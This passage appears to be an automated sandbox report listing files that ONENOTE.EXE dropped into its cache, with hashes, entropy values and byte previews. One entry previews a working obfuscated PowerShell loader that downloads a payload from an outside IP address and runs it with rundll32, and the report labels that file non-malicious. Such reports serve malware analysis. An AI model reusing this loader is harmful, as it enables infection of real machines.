Preview:	....8..............@............?....?..?...................................................................................................................8...V.......4..@.............................X$......X$4&./N...."YX..............-F.....;.......-F.....;......_.^m.^F..5..U..._...X$4&./N...."YX.X$............................................................................5......_.7...7L...................................................................................x....@......Z....h...N...............F...\G.L.....e.........................................................x.......x.......x.......p........e...........x....@......Z.........._......._.....................................................".......d.1..._.N.:..._.N.H.._.7._.7...........................................4..(...(......_.7P'..._.7P.G.._.7`.?.._.7P...._.7X.R.._.7P.i.._.7T...._.7.....................X$...o...................................X$..c..,..............2.......,...x............_.......X$._.7.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000003.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	8192
Entropy (8bit):	4.5288521081549895
Encrypted:	false
SSDEEP:	192:EYrS9rap+DsuLKfhbZPT/KsBM0cxZuIX:EYo2kDsOi5vOxZuIX
MD5:	CB87DBEC9F9B6F5C13C264DAF4D53397
SHA1:	7ACC069F9AEF362B7716D2D1AE431CD4EBB5A360
SHA-256:	61A0518947C2EC7AE5AC4158410D0EFC3FECDBE4A8101840926119258E12A272
SHA-512:	44165830F8DE5FA67DD8837F86CFD43260620BCEBFF5BE5D143634E25C8AE5965FE380599CF66B38C2ADEB9374842D1E27A80F1748296157C61276E8BF37E095
Malicious:	false
Preview:	.......@........p..........~....................?.......?............................~..................................................................V......@...........................@.....h_.j.2.....j.2.^.N....J..F...........@.....h_.........0.......0.......H.......H........J.....C...h..P..J.......j.2...................................................................5......_.7...7L......................j.2.........................................................$.N..Q..$.N\....$.N..P.N................Bo..O....nl-.........2...............................j.2.$.N....+...J..N............J.......J.....C...h..P.............B..C.H.n.l.............................................................N.......N....(.,.1...............B..C.H.n.l............................4..~...1...(...(...<...O.n.e.N.o.t.e. .N.o.t.e.b.o.o.k.s.\.M.y. .N.o.t.e.b.o.o.k.......M.y. .N.o.t.e.b.o.o.k.........&.......`...6...N....(.,.1....[..u@.....D9U.J.....C...h..P.........j.2.$.N.......

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000004.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	1.2620589094041788
Encrypted:	false
SSDEEP:	12:JYq6NYOQur4YwXpCl60/hGlllxoLF3pg5dNd4jviSP4i9Upx:qaOppwXpClLhGl/xd5dNd4j54r
MD5:	4D31782E9812813898109C2FE9E23B94
SHA1:	DBC6882A7E745229638E9903B373E639735E74FC
SHA-256:	35F5F5199380E3CE2FF62DB47C9FF68DB67316D30647FF6C79D71640698E475B
SHA-512:	838DF077D7AA1D1BFED30BE76CFB32D7DB9D04D646B1ACE10E54912F257A30462CD8DF11FA3F3AB43BA32E1C7FE83D59DF229783051B5E7DCD53B59AD52BC4F5
Malicious:	false
Preview:	....>...........x....................?..................................................................................................................................................................{.......{......O....7....&.......&.o._.L.....qh..v...8B.%......#.v...&.o._.L.....qh'.&..{......O....7...{........{.....................................................................5......_.7...7L......................{..............................................................To.J...b.............................A..We.N..u.y..l....h...N.......................................................................To.J...b.............A..We.N..u.y..l..........&.......&...................................................&...C...&.`.1...&...F....................................................4..~...1...(...(.......O.p.e.n. .S.e.c.t.i.o.n.s.......O.p.e.n. .S.e.c.t.i.o.n.s...........1.......O.p.e.n. .S.e.c.t.i.o.n.s..........v.......v...8B.%......#.&.......&.o._.L.....qh'2.......................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000005.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	2.323454019770542
Encrypted:	false
SSDEEP:	24:XqeEv92fgFTVIl7Czvlhf3fRXMEK+Zrm5RbrPS/U5Ylj5l5lfxf3f88f:NEv924FT5B7///gIjTC
MD5:	9446288C2DC755C7F034D58FD52966E8
SHA1:	025C09F91BFEDC0E47B76830A830AD9048479AC4
SHA-256:	12E5361537CBE171EA2FC4030D6D94412FB25F37CAE438C17547BDE8BB455528
SHA-512:	93A194A4F683A83E74F5564D19B2EA57810AC989FE42F5E7E69F714908F6A1A3D6A6333AC08657D9844976565135E59A04EF0DA6CF4743E6EDDE6BFD558F70BB
Malicious:	false
Preview:	....>...............>.......................................................................................................................................v...........................................aQ/.....aQ/....N.l.k.8n.sek.....sek.....9<..D.sek.....9<..D2sek.P.....w. x....[.P...aQ/....N.l.k.8n.aQ/..........sek.....sek.................................................aQ/T....sek..$..sekX....sek...............................................4..(...(...............0............4..e....5..b4.............o....bJ.$.x.j......(...(......%.:.......>..*..K.....z..............sek..0...e... ..$.....}&.u".N......W.PB{t.:........sek.....sek.....9<..D2P.......P.....w. x....[.2...............................aQ/..................................aQ/.....P....c..,0...e...B4.$..........[(..C.5.._......%.:.....................K..j....,....N...^................................................................................................................K..j....,.............K..j....,....

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000006.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	4.336266154281417
Encrypted:	false
SSDEEP:	192:VefRhiYmXQ6VRc4xwYOPY7+KdYmRR0W08CvYkkJZRcTuQi:VAqQ6VRrOY+mR0wPRw
MD5:	CD36C54D332A6682FD8DD30612D2ECE5
SHA1:	9178ED627C9F5A1E422A644AB735C12367D64CC1
SHA-256:	A305DCAEAA7BA3945A384042595CD2179E643AD03226A08F639041F4B7552A9B
SHA-512:	91367B3E0445CC42D6A593DFFEF4A1C865A4E5B8E3C34F83004C0870D1B6D02E7106A0781C90535072A6416277A1EE7D085A3F7324880EF302FBCEAAF9FC8F87
Malicious:	false
Preview:	........r..@H......@...H....&.........@...@........T...@..........................................................................?................................................................v.......................>...W^.g..M...=..N..............4\o.):A.:.._..j.........4\o.):A.:.._..j.........LZ.I.......................................................................4.... ..4.......4...... 4......!4............!...............$.s.....K.Z.G.A....p.n.g...............z...,4. ...........$.4..V/.Q........D..N{I....2..~..c.m.d...........u.......A.......a.d.m.i.n...............z... ..$...............................Q...............?......@?..@?...pA...?...........................4..........;.......R4...4...4...4......................0............4..e...b4.............o....bJ.$.x.j......(...(......%.:........z.......................................>...........V..Q.......C...?......@?..@?....?...@...........A...........S.....c............... .B.....$.........F..............3.^.......

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000007.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	PNG image data, 1692 x 810, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	76485
Entropy (8bit):	7.79809544163696
Encrypted:	false
SSDEEP:	1536:xvY6z54EJ+ytgXIeZCXIokE9Kkf2oY7LLw7wDzKiivL4w1jr8TYEo7s:xgS2EJbyYeMYkKkyX3DWvLLATiY
MD5:	734BA03175EBC8B8E3EF57BC3DDC9D8E
SHA1:	1C0EA89A657A5D157D06EEF8C1BC722BC2CFD918
SHA-256:	275DEEC71606F71DC7F6F81026F797B7F36F3BB2203B4483007BBCA1E4447528
SHA-512:	23EA232051472C3F4F61D81012F989BA54B24180C1353C860BCBBD92C89D2F395BF02786902AA9E0BFF634043A5C5E73CDB743124A8B5ECFBD0D583F28BB0B9F
Malicious:	false
Preview:	.PNG........IHDR.............v......gAMA......a....IiCCPsRGB IEC61966-2.1..H..SwX...>..e.VB..l.."#....Y....a...@...V....HU...H...(.gA..Z.U\8....}z...........y.....&..j.9R.<:...OH.....H.. ....g......yx~t.?...o...p..$......P&W. ...".....R...T.......S.d.....ly\|B"......I>................(G$.@..`U.R,......@"......Y.2G.....v.X..@`...B,.. 8..C.... L..0.._p..H.....K.3.....w....!..l.Ba.).f.."...#.H..L.........8?......f.l....k.o">!.........N..._....p...u.k.[..V.h..]3...Z..z..y8.@...P.<......%b..0.>.3.o..~..@...z..q.@......qanv.R....B1n..#.....)..4.\,...X..P"M.y.R.D!.....2......w....O.N....l.~.....X.v.@~.-......g42y.......@+..........\...L....D...A..............a.D@.$.<.B.......A.T.:.............18....\..p..`........A...a!:..b.."......"aH4... ..Q"..r...Bj.]H#.-r.9.\@.... 2....G1...Q...u@......s.t4.]...k....=.....K.ut.}..c..1.f..a\..E`.X.&..c.X5V.5c.X7v....a..$......^...l...GXLXC.%.#....W...1.'"..O.%z...xb:..XF.&.!.!.%^'.._.H$...N.!%.2I.IkH.H-.S.>..i.L&.m....... ......O.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000008.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	ASCII text, with very long lines (585), with no line terminators
Category:	dropped
Size (bytes):	585
Entropy (8bit):	5.967951232824609
Encrypted:	false
SSDEEP:	12:snL9hLLgyaI4HPKC2EwO45xeM8spEO7b2WO1xyRciV0hMmzVt3FE+pwtB:iphLLCHPKC2Ey1EWbTNV0hJVBa+SB
MD5:	98BF90784670146355CD8C0B448374D9
SHA1:	69BDCEDA1CCD23D7A6AC121A6D06DBD10BDF028F
SHA-256:	EBFA09E9DAAE96EFB34FBF8DC6E4F4564EF72BED884FE4DA3C860687A5668227
SHA-512:	DBEE85B82F972CCED280437B89D030F7DA05F04D86E2EAA9460307DB0B26942BBA66960CE0E72389BD4399BBEC08B6AA01727F7A4DB81F1EE15338BDBA0751F3
Malicious:	false
Preview:	powershell.exe $atKUf9 = '62889e73828c756c961c5a6d6c01a463'; [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('DQpAZWNobyBvZmYNCnNldCBhMXlKRFJMUT1heHZnc0sNCnNldCBhTFF1Q1J5NT1hSG5CZFVNMg0Kc2V0IGFGZGl6SWtEdD1hYlBTNXENCnBvd2Vyc2hlbGwgKG5ldy1vYmplY3Qgc3lzdGVtLm5ldC53ZWJjbGllbnQpLmRvd25sb2FkZmlsZSgnaHR0cDovLzg3LjIzNi4xNDYuMzEvMzgxOTkuZGF0JywgJ0M6XHByb2dyYW1kYXRhXGdiLmpwZycpOw0Kc2V0IGFnTWFlM3BDPWF5YXUzDQpzZXQgYW1QdFVNY0E9YVJaamUNCmNhbGwgcnUlMWxsMzIgQzpccHJvZ3JhbWRhdGFcZ2IuanBnLFdpbmQNCmV4aXQNCg==')) > C:\Users\Public\1.cmd&&start /min C:\Users\Public\1.cmd nd

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000009.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	PNG image data, 40 x 40, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	1354
Entropy (8bit):	7.799120546917745
Encrypted:	false
SSDEEP:	24:AXFMpSCdmi2MTbWm/8T368Bf50D+1vDD9BFGBsQ5SOryjJ4w6++mPKc82UGOpIUg:AO4m122bQ36gfaS1rDw2QsOryjJ4xLml
MD5:	C2BF462C1311A92660999498F29394BD
SHA1:	4BD7C156F172C1114F33D80BAB05252C9F8E87C0
SHA-256:	5E0A8F7D863DAD057AC91FB888CFA7BE1D30A6CF65A908CE90081C323A0858B7
SHA-512:	1107117B3C4B843E5EB32CB13C5CA91E28857DDAE18A197F471D9FCA5B767C7441661FC3A21D2B6FF3C6EB91048A93598E1D86EA55A60A427D8E4B82E59A30C9
Malicious:	false
Preview:	.PNG........IHDR...(...(........m....sRGB.........pHYs...t...t..f.x....IDATXG..O.W....`...c.C..`.H(!@.[Q..B.D......Q..}.C...}.CTU.MR.j...[.....".x.B.x.wG.2$xf.J..W..g....}w.H.....b* ...../.V_\|.....TC]-.d......\\Z..l......>..D....G.....}.]}.x...X...WZ....?.-..A..&x...Q$)U..../.w...?..!8IE..:.....6..y.z..Yg.`g.@(...z...VS..$@..q2.,."....RT.}..%..q.lA0....[m.................2...8..a.LJ....n......M.%x......\...$g.Y.p.Q^U....$;.r.....>...>...]..$...r..bz.P.(....}:&'ldc...c\|.bs.>z.:?.M....(.SR..a..o..=2....i#..{......y.)....}.1_ .....T@O..F..d....Piu.TQA....#DY.S&G....j....3z..>zL..:...33...C&.S....h...LQk. ...hRSy&m..?...d.....l.].G...BL.-..N;.....s.0Q....T.(0...p....HU..d.V..z.)..2. ..........d...x.{......2.zdP.....;.?aeu......(..,#.....nj.... ....0.X..dr.T)x...4.V...]p8].p.PH.4f{.n.....x.........Z...O>DF.)^.Y.....p.Zf..1e.a.>."fm{.=hui...Fnn.T......./''...U<.,f'........:Y......ckk..RN.....f.omf..rZi.\..h.....\|.4.,/......=.z%.F....Z...>..A.....?.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000A.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	GIF image data, version 89a, 1012 x 327
Category:	dropped
Size (bytes):	11765
Entropy (8bit):	7.911655818336033
Encrypted:	false
SSDEEP:	192:aUpmR1MS7mEuHIgBEoe/nOdV8EHi+rBJZ2M6qhH03NMWjvD5ZktcatNy+AT3jCOj:aUOVTi9EoDH8ujBJwMvhU3mgocatgdOm
MD5:	B035F23C68CC9673E604FE5472F223D2
SHA1:	56495B558547AACCE34C65C1D1FCF6C9ECAFCEE1
SHA-256:	F3F791A1303058D4F363E02F0515DE8484249624857CAF5ECE6C926D7324114C
SHA-512:	B6923EC5D91F5C771B65C63A97AB23BC8E6762CA60C31DEE8D1D141703923EDDFC266229B263EA88E10AF89A92C0EF361BF91A3D5CB600AE129C452D94580662
Malicious:	false
Preview:	GIF89a..G.................................................................................................................................................................\|.................................................................................................Y..Z..\.._..a..c..d..f..e..i..k..m..n..p..s..r..v..y..z..}..~....................0..3..5..6..7..9..<..>..@..B..C..E..G..J..N..N..P..R..T..V..[.................................................. ..!..#..#.."..$..&..&..(..)..+..+..,..,.....1..3..4..6..9..;..=..?..B..E..G..I..L..N..O..Q..S..W..Z..]..^..`..a..b..d..g..h..j..m..p..s..u..x..{..\|..~.................................................................................................................................................!.......,......G........H......\....#J.H....3j.... C..I...(S.\...0c.I...8s.....@...J...H.]...P.J.J...X.j....`..K...h.]...p..K...x..........L....N....8q..i.L....3k.....C..M....S.^....

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000B.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	PNG image data, 1692 x 810, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	76485
Entropy (8bit):	7.79809544163696
Encrypted:	false
SSDEEP:	1536:xvY6z54EJ+ytgXIeZCXIokE9Kkf2oY7LLw7wDzKiivL4w1jr8TYEo7s:xgS2EJbyYeMYkKkyX3DWvLLATiY
MD5:	734BA03175EBC8B8E3EF57BC3DDC9D8E
SHA1:	1C0EA89A657A5D157D06EEF8C1BC722BC2CFD918
SHA-256:	275DEEC71606F71DC7F6F81026F797B7F36F3BB2203B4483007BBCA1E4447528
SHA-512:	23EA232051472C3F4F61D81012F989BA54B24180C1353C860BCBBD92C89D2F395BF02786902AA9E0BFF634043A5C5E73CDB743124A8B5ECFBD0D583F28BB0B9F
Malicious:	false
Preview:	.PNG........IHDR.............v......gAMA......a....IiCCPsRGB IEC61966-2.1..H..SwX...>..e.VB..l.."#....Y....a...@...V....HU...H...(.gA..Z.U\8....}z...........y.....&..j.9R.<:...OH.....H.. ....g......yx~t.?...o...p..$......P&W. ...".....R...T.......S.d.....ly\|B"......I>................(G$.@..`U.R,......@"......Y.2G.....v.X..@`...B,.. 8..C.... L..0.._p..H.....K.3.....w....!..l.Ba.).f.."...#.H..L.........8?......f.l....k.o">!.........N..._....p...u.k.[..V.h..]3...Z..z..y8.@...P.<......%b..0.>.3.o..~..@...z..q.@......qanv.R....B1n..#.....)..4.\,...X..P"M.y.R.D!.....2......w....O.N....l.~.....X.v.@~.-......g42y.......@+..........\...L....D...A..............a.D@.$.<.B.......A.T.:.............18....\..p..`........A...a!:..b.."......"aH4... ..Q"..r...Bj.]H#.-r.9.\@.... 2....G1...Q...u@......s.t4.]...k....=.....K.ut.}..c..1.f..a\..E`.X.&..c.X5V.5c.X7v....a..$......^...l...GXLXC.%.#....W...1.'"..O.%z...xb:..XF.&.!.!.%^'.._.H$...N.!%.2I.IkH.H-.S.>..i.L&.m....... ......O.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000C.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	PNG image data, 1692 x 810, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	76485
Entropy (8bit):	7.79809544163696
Encrypted:	false
SSDEEP:	1536:xvY6z54EJ+ytgXIeZCXIokE9Kkf2oY7LLw7wDzKiivL4w1jr8TYEo7s:xgS2EJbyYeMYkKkyX3DWvLLATiY
MD5:	734BA03175EBC8B8E3EF57BC3DDC9D8E
SHA1:	1C0EA89A657A5D157D06EEF8C1BC722BC2CFD918
SHA-256:	275DEEC71606F71DC7F6F81026F797B7F36F3BB2203B4483007BBCA1E4447528
SHA-512:	23EA232051472C3F4F61D81012F989BA54B24180C1353C860BCBBD92C89D2F395BF02786902AA9E0BFF634043A5C5E73CDB743124A8B5ECFBD0D583F28BB0B9F
Malicious:	false
Preview:	.PNG........IHDR.............v......gAMA......a....IiCCPsRGB IEC61966-2.1..H..SwX...>..e.VB..l.."#....Y....a...@...V....HU...H...(.gA..Z.U\8....}z...........y.....&..j.9R.<:...OH.....H.. ....g......yx~t.?...o...p..$......P&W. ...".....R...T.......S.d.....ly\|B"......I>................(G$.@..`U.R,......@"......Y.2G.....v.X..@`...B,.. 8..C.... L..0.._p..H.....K.3.....w....!..l.Ba.).f.."...#.H..L.........8?......f.l....k.o">!.........N..._....p...u.k.[..V.h..]3...Z..z..y8.@...P.<......%b..0.>.3.o..~..@...z..q.@......qanv.R....B1n..#.....)..4.\,...X..P"M.y.R.D!.....2......w....O.N....l.~.....X.v.@~.-......g42y.......@+..........\...L....D...A..............a.D@.$.<.B.......A.T.:.............18....\..p..`........A...a!:..b.."......"aH4... ..Q"..r...Bj.]H#.-r.9.\@.... 2....G1...Q...u@......s.t4.]...k....=.....K.ut.}..c..1.f..a\..E`.X.&..c.X5V.5c.X7v....a..$......^...l...GXLXC.%.#....W...1.'"..O.%z...xb:..XF.&.!.!.%^'.._.H$...N.!%.2I.IkH.H-.S.>..i.L&.m....... ......O.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000D.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	1.524493621215413
Encrypted:	false
SSDEEP:	24:8hs4smcjlVTb6m7JpgON7mQNmmdnpzmEJmdn:bLfVTb6m7Jp17mQNmmdn5mEJmdn
MD5:	C606C81F4B5B20D4E7B837FE826F5F5E
SHA1:	5DB4EFE9EA928E97853879B83B74D65281DEE6DB
SHA-256:	BFD01326341E0F346F5DD3F8C00426D2B62C244D85931717BB17A93360F29F1F
SHA-512:	D2EF811F57631F7DCFE918765332A799317EE201BD20256FEEA885D2578CBCE7F068E159D8613FE6EF6EDD50826A6840E0B1FA9C0E62BABE898A520A90BAEE54
Malicious:	false
Preview:	2...>...........x.......................................................................................................................................2...>...........x...,...2...>...X.......x........eh......eh....K.FV...!.lvh.....lvh...uE.E.j.6..lvh...uE.E.j.6..lvh..eh....K.FV...!.eh...........................eh...................................................................5......_.7...7L.......................eh.........................................................FS..O.D.8...>......h...N..................&9,O.3..F.[^...............................................................................&9,O.3..F.[^.........FS..O.D.8...>...........lvh.....lvh.................................................lvh..1..lvhX.4.......................................................0...e.......A...^WN..,..^@.`.../;...................4......(...(...........8.....?...............................................................................................................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000E.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	0.880227695087472
Encrypted:	false
SSDEEP:	6:XaE560WGQgEWM4HUWGk2n/llsu/hu9KudlZVG+1FfG3+fuNrUTSdzsOxNHXpvcEx:X67G9pMeGPl6ehaxFw+GNoTuwtE0
MD5:	604247D5B9972FEB45E40160EDE415A6
SHA1:	5AC7D6F1EA3B259887348A99F0F33660D2EB65B9
SHA-256:	6DEF10BDDDFD130F573E1D0F7D4F6ADA85D1C7D44E434E18FD7F2E35F4F64018
SHA-512:	82D620AD3EBEA753F6D01C0BBF0E42769E57CC0E45A95DB0C0F536420FF51ACA4C6E3D9C31D20F7972041B2BF5552117FD4F26A8A65700AF59594510CD2257C8
Malicious:	false
Preview:	2...>...........x.......................................................................................................................................................................................N8......N8.b`".O....}.[............>..E....e......>..E....e......N8.b`".O....}.[N8.................................................................................................5......_.7...7L...................................................................................:...^E.4Ya.K.....h...N.................X@P."N.#..T.................................................................................X@P."N.#..T.............:...^E.4Ya.K..........N8......N8..................................................N8...6..N8.`.1............................................................4..~...1...(...(.......Q.u.i.c.k. .N.o.t.e.s.......Q.u.i.c.k. .N.o.t.e.s...........1.......Q.u.i.c.k. .N.o.t.e.s.............................................................................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000F.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.473224704290766
Encrypted:	false
SSDEEP:	48:qebzrAQv+Zesaqxz3L7FExyw0LnzpBlkw0LQu5CLjowEwLNeCQQ:qeEQv8ZxjqxyLxgLUu5ClEwBQ
MD5:	CA3AAC584CD10A9BA7EA7078AABF27BA
SHA1:	2050C45B9908DBA3EAE8CDC56FB68F318A1C05B0
SHA-256:	003001E3917DAFF9971C200963B1285069AAC5149704FE47FE2F8D1664B64257
SHA-512:	482E8D74571FCEB8C91C6733989C41AA6775FDCA755BFBEA4E0F7CFB88A530C52AFB9B4D8F797CD7D19B96E85EF8CF8A4836F54D46EAE56D54E3F02449D942E8
Malicious:	false
Preview:	j......@$...........t......................................................?............................................................................j......@\.........................................#.......#MS...4m..'..z..(.......(We.........P..#MS...4m..'..z..#...........uo`.d.....(We.........P...(............(.......(.......................................................'..........a.oGG.....oGGa....$.?pMu.2...^.............................(.oGG..g}..y....................(.......(X......(..2....(.......(.."...y.T$... ..T.N..^..T%n.......g}.........c..,0...e...B4.$..........C@RQ.H..B......Y.....................y.......y.....N..B.J5T..................uo`...aK..../...z...aK..g}/..mA..^.D...g}..=.oS."B.yt%....=......>.........................uo`.d..(We.........P.=.oS."B.yt%........^.......oGG..c..,0...e...B4.$...........I...M.....0...............................0...........e....4..................T.i.t.l.e.......\|{....B.l...R......(....Y......(...D...L.e.c.t.u.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000G.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	8192
Entropy (8bit):	4.684144066215332
Encrypted:	false
SSDEEP:	192:esVO3pQqQKWgLBL9MXO2vckDK0zeHXaGEqRiNUQ3Ru0:L70B5M+2vFS3GqRi
MD5:	78336191DF5886FDC6C23D1CFBBFAAB0
SHA1:	190D6CAA2C07B9D6ECB030C7874FDB58A0084924
SHA-256:	51827BDB0617C74ACDCC2F1F0AF3B741E8E6E056BE26681015A64870B631FD93
SHA-512:	72AB153BB6381BBCDBDF31751262A3C04B74E98EC14AC84053D848E852680C1CA08F1B569F68E5E024FF2A8F0DD02E8347239F5DD33C23019E802ACD212F0F77
Malicious:	false
Preview:	2...>.......D...v...8...................................................................................................................................2...>... .......v...l............................I.......I.qk..B.....LZB+..4...B+.IU...0P....$.B+.IU...0P....$.B+...I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'.............."m.........h9....N...^...................NuC...o..............@f....................................I.qk..B.....LZ............."m.........h9........."m.........h9.........B+......B+......B+..........................................B+.j....B+.T%...B+......B+...7..B+.H....B+. ....B+.$....B+...~...............;........4...4...4.............B+.:B+.YB+.ZB+...z...y.. x.. ...........$........&..$...7...7.....*...o.e.L.o.c.I.D...o.e.L.o.c.C.o.m.m.e.n.t.......0.0.0.7....................HB+...z... ..$......................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000H.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	40884
Entropy (8bit):	7.545929039957292
Encrypted:	false
SSDEEP:	768:MCBOA4d+ElOXJ/3pI7cRBiL7L6qERqGz65WXzZqJsKQSbIsTT6XB:hIAU+2cGdLX6qBG4WDZl4Ihx
MD5:	7379775A1E2AB7FAB95CFFCE01AE05F3
SHA1:	3D3DDFD8AC7E07203561BAE423D66F0806833AB3
SHA-256:	9301DB6D2D87282FCEE450189AEACE16D85F64273BF62713A3044992B6B7A9E9
SHA-512:	4B5006E620E80D3A146944649CF4CA619782CAD7E8C4CD0D1DE0EBCA0FA05EACB7378DAFCEED3E26F5698B07F19604614D906C8F51F898660E2F129D8DEC6F62
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d............................................................................................!.1A.....Qaq....".....2....BR#S..br...3T...C$.7(Hx....4D.G..Xh.cs..'..t...%...8.....................1...!AQ..a...q"2.4Tt.......R3S....Br...#s...Uu.bc.de..$D..6..C%E..............?...z...;sB.yv...........]t.\...n...../....m....M.=.3G+..x+.....S).*&.J../..8..O/+..sG...p...<!....~.c..C.w..,[oHom.wc-.J.~.......L[..6...'..i_..S;...!Y.z.q].EK..M.x...i.x.+.;.+...}....#......f.)........e6V..p.;........s.)..Ml.J......IU.6...<9+9.^..l..Y...[._...2..^..j.ia...._..3.;...~..<3...;......z.^.......]..Qk.,...Yk...3.3Jy^p.}....q...I...&..t.......;..9.g.GH;..'...%...)..[..y..../...zCn..>...'...1e.Y..;....]..7...N>t..m-.j.............H^..T\.q.ru...}...eTn]I'r.^].#..wOY....v

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000I.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	12288
Entropy (8bit):	4.405083677315561
Encrypted:	false
SSDEEP:	192:c8s9QHJ8LaWagJZcBSJdBtCrteRJmwXD4RkVJuPMhxu1N798JsiZb82NVPnW6sXh:cB96J4+QXrtQtejVD4Rk/uPMO1vUnlq
MD5:	FC4BABA8118C96C440B20EE188C873E4
SHA1:	C35ECA92E1AD0CC7906D462CA4314A8B41CA28D9
SHA-256:	06C4875C67874D3AE5356CE7FA51CE44B69429B52859CCA4D3301231BBD5F5BA
SHA-512:	52AE095F359EE59D479CD5DB3BED285CDCF323C9255393D143CAEDEC8861C8F477E2D8BB547F34C348505ED0351597C8A2F365D78CD61BF4706C3BB51BEF94CC
Malicious:	false
Preview:	2...>...v.......v.......@ ..X)..2...>...2.......v.......@...H(...........................................................................................................................................I.......I.qk..B.....LZ...H.......N......z.6.....N......z.6.....I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'.............ZN..O.....3l3>#^....N...^................L.....M.&....q.................................................I.qk..B.....LZ............ZN..O.....3l3>#^............................................................................................j......T%a......5............z...................M...............;........4...4...4...............3..L..S..K....z...y.. x.. ........ ..$...$........D..........7...7.........*...o.e.L.o.c.I.D...o.e.L.o.c.C.o.m.m.e.n.t.......0.0.0.1.9....................................;.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000J.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 7.0, datetime=2004:03:04 13:19:29], progressive, precision 8, 221x792, components 3
Category:	dropped
Size (bytes):	24268
Entropy (8bit):	6.946124661664625
Encrypted:	false
SSDEEP:	384:d2wiieoHTRh5a1HAteZCWOZIM+L7WhNjYn:8wHFHJ+/OZIKhNO
MD5:	3CD906D179F59DDFA112510C7E996351
SHA1:	48CDB3685606EDD79D5BCDF0D7267B8B1CCBD5A8
SHA-256:	1591FD26E7FFF5BE97431D0ED3D0ADE5CFC5FA74E3D7EC282FD242160CE68C1F
SHA-512:	2048CBA13AF532FF2BCC7B8B40541993234BD1A8AB6DE47B889AF3F3E4571F9C5A22996D0B1C16DD6603233F6066A1A2A97C16A6020BEDD0826B83BAD0075512
Malicious:	false
Preview:	......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop 7.0.2004:03:04 13:19:29.....................................................................................(.....................&...................H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d...................................................................................................................................................$.."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?.....)......[]t.\Z..g......A....&D.$LH._..X..Xl...`....cZ.X.........>......f.Z.X...]..~L.S..@..I$..I.IO.....x...s.g.[f.h{9..

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000K.bin

